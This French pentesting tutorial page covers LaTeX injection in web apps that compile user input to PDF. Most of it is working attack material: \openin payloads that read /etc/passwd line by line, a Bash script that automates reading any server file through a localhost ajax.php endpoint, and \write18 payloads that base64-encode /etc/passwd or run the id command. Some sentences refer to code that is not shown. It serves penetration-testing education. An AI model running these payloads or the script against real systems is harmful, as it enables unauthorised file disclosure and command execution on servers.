Latex Injection Techniques - Pentesting Web

Créez un fichier LaTeX avec le contenu suivant et générez une URL avec un fichier PDF :

Utilisez le site web salmon pour essayer d'insérer des commandes (dans ce cas, elles sont interdites) :

Voici le code PHP avec la sanitisation :

Cependant, la sanitisation ne prend pas en compte les commandes suivantes qui permettent de lister ligne par ligne un fichier du système :

\newread\file
\openin\file=/etc/passwd
\read\file to\line
\text{\line}
\closein\file

Ainsi, connaissant cela, ce script Bash va automatiser tout pour afficher n'importe quel fichier du système :

#!/bin/bash
# Variable locale
declare -r main_url="http://localhost/ajax.php"
filename=$1

if [ $1 ]; then
    read_file_to_line="%0A\\read\\file%20to%20line%0A"
    for i in $(seq 1 100); do
        file_to_download=$(curl -s -X POST $main_url -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -d "content=\\newread\\file%0A\\openin\\file=$filename$read_file_to_line%0A\\text{\\line}%0A\\closein\\file&template=blank" | grep -i download | awk 'NF{print $NF}')

        if [ $file_to_download ]; then
            wget $file_to_download &>/dev/null
            file_to_convert=$(echo $file_to_download | tr '/' ' ' | awk 'NF{print $NF}')
            pdftotext $file_to_convert
            file_to_read=$(echo $file_to_convert | sed 's/\.pdf/\.txt/')
            rm $file_to_convert
            cat $file_to_read | head -n 1
            rm $file_to_read
            read_file_to_line+="%0A\\read\\file%20to%20line%0A"
        else
            read_file_to_line+="%0A\\read\\file%20to%20line%0A"
        fi
    done
else
    echo -e "\n[!] Usage: $0 /etc/passwd\n\n"
fi

Une autre façon de le faire serait de convertir le contenu en base64 :

\immediate\write18{cat /etc/passwd | base64 > output}
\input{output}

Collez le contenu dans un fichier appelé data et décodez-le en texte normal :

cat data | tr -d '\n' | base64 -d; echo

Pour exécuter des commandes, vous pourriez utiliser le contenu suivant (dans ce cas, id) :

\immediate\write18{id > output}
\newread\file
\openin\file=output
\read\file to\line
\text{\line}
\closein\file

Mis à jour il y a 11 mois

Ce contenu vous a-t-il été utile ?